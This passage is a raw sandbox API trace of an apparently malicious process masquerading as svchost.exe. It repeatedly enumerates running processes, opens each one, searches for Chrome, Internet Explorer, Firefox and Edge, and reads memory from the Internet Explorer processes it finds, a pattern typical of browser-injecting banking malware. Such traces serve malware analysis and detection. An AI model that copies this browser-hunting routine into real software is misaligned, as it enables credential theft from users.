	[0222.884] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0222.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.884] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.884] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0222.885] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.885] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.885] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0222.885] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x5574
	[0222.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.886] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0222.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.886] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.887] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0222.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.887] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.887] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0222.888] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x5578
	[0222.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.888] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0222.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.889] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.889] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0222.890] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.890] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.890] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0222.891] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x557c
	[0222.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.891] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0222.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.891] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.891] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0222.892] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.892] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.892] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0222.893] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x5580
	[0222.893] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.893] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0222.893] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.893] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.907] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0222.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.907] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.907] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0222.908] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x5584
	[0222.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.908] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0222.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.908] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.910] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0222.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.910] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.910] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0222.911] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x5588
	[0222.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.911] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0222.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.912] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.913] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0222.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.913] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.914] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0222.914] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x558c
	[0222.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.915] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0222.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.915] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.916] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0222.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.916] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.916] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0222.917] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x5590
	[0222.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.917] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0222.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.918] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.919] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0222.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.919] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.920] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0222.921] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x5594
	[0222.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.921] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0222.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.922] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.922] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0222.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.923] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.923] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0222.924] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x5598
	[0222.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.924] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0222.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.924] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0222.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.925] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0222.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.925] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.926] NtQueryInformationProcess (in: ProcessHandle=0x5598, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0222.926] ReadProcessMemory (in: hProcess=0x5598, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0222.926] ReadProcessMemory (in: hProcess=0x5598, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0222.926] ReadProcessMemory (in: hProcess=0x5598, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0222.926] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0222.926] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0222.927] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x559c
	[0222.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.927] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0222.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.928] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0222.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.928] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0222.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.928] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.928] NtQueryInformationProcess (in: ProcessHandle=0x559c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0222.928] ReadProcessMemory (in: hProcess=0x559c, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0222.929] ReadProcessMemory (in: hProcess=0x559c, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0222.929] ReadProcessMemory (in: hProcess=0x559c, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0222.929] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0222.929] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0222.930] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x55a0
	[0222.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.930] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0222.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.931] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.931] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0222.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.931] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.932] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0222.932] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x55a4
	[0222.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.933] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0222.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.933] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.933] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0222.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.934] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.934] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.935] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x55a8
	[0222.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.935] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.935] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.936] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.936] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.936] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.937] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.938] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x55ac
	[0222.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.938] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.938] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.938] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.939] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.939] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.940] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x55b0
	[0222.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.940] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.941] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.942] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.942] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.942] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0222.943] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x55b4
	[0222.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.943] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0222.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.943] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.944] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0222.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.944] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.944] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0
	[0222.945] CloseHandle (hObject=0x4fd0) returned 1
	[0222.945] Sleep (dwMilliseconds=0x64) 
	[0223.052] GetCurrentProcessId () returned 0x110
	[0223.052] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0223.058] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0223.061] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0223.062] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0223.063] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x55b8
	[0223.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.063] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0223.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.063] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.063] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0223.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.064] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.065] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0223.066] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x55bc
	[0223.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.066] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0223.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.066] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.067] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0223.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.067] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.067] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0223.068] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x55c0
	[0223.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.068] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0223.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.068] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.069] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0223.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.069] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.069] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0223.070] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x55c4
	[0223.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.070] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0223.071] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.071] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.071] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.071] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0223.071] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
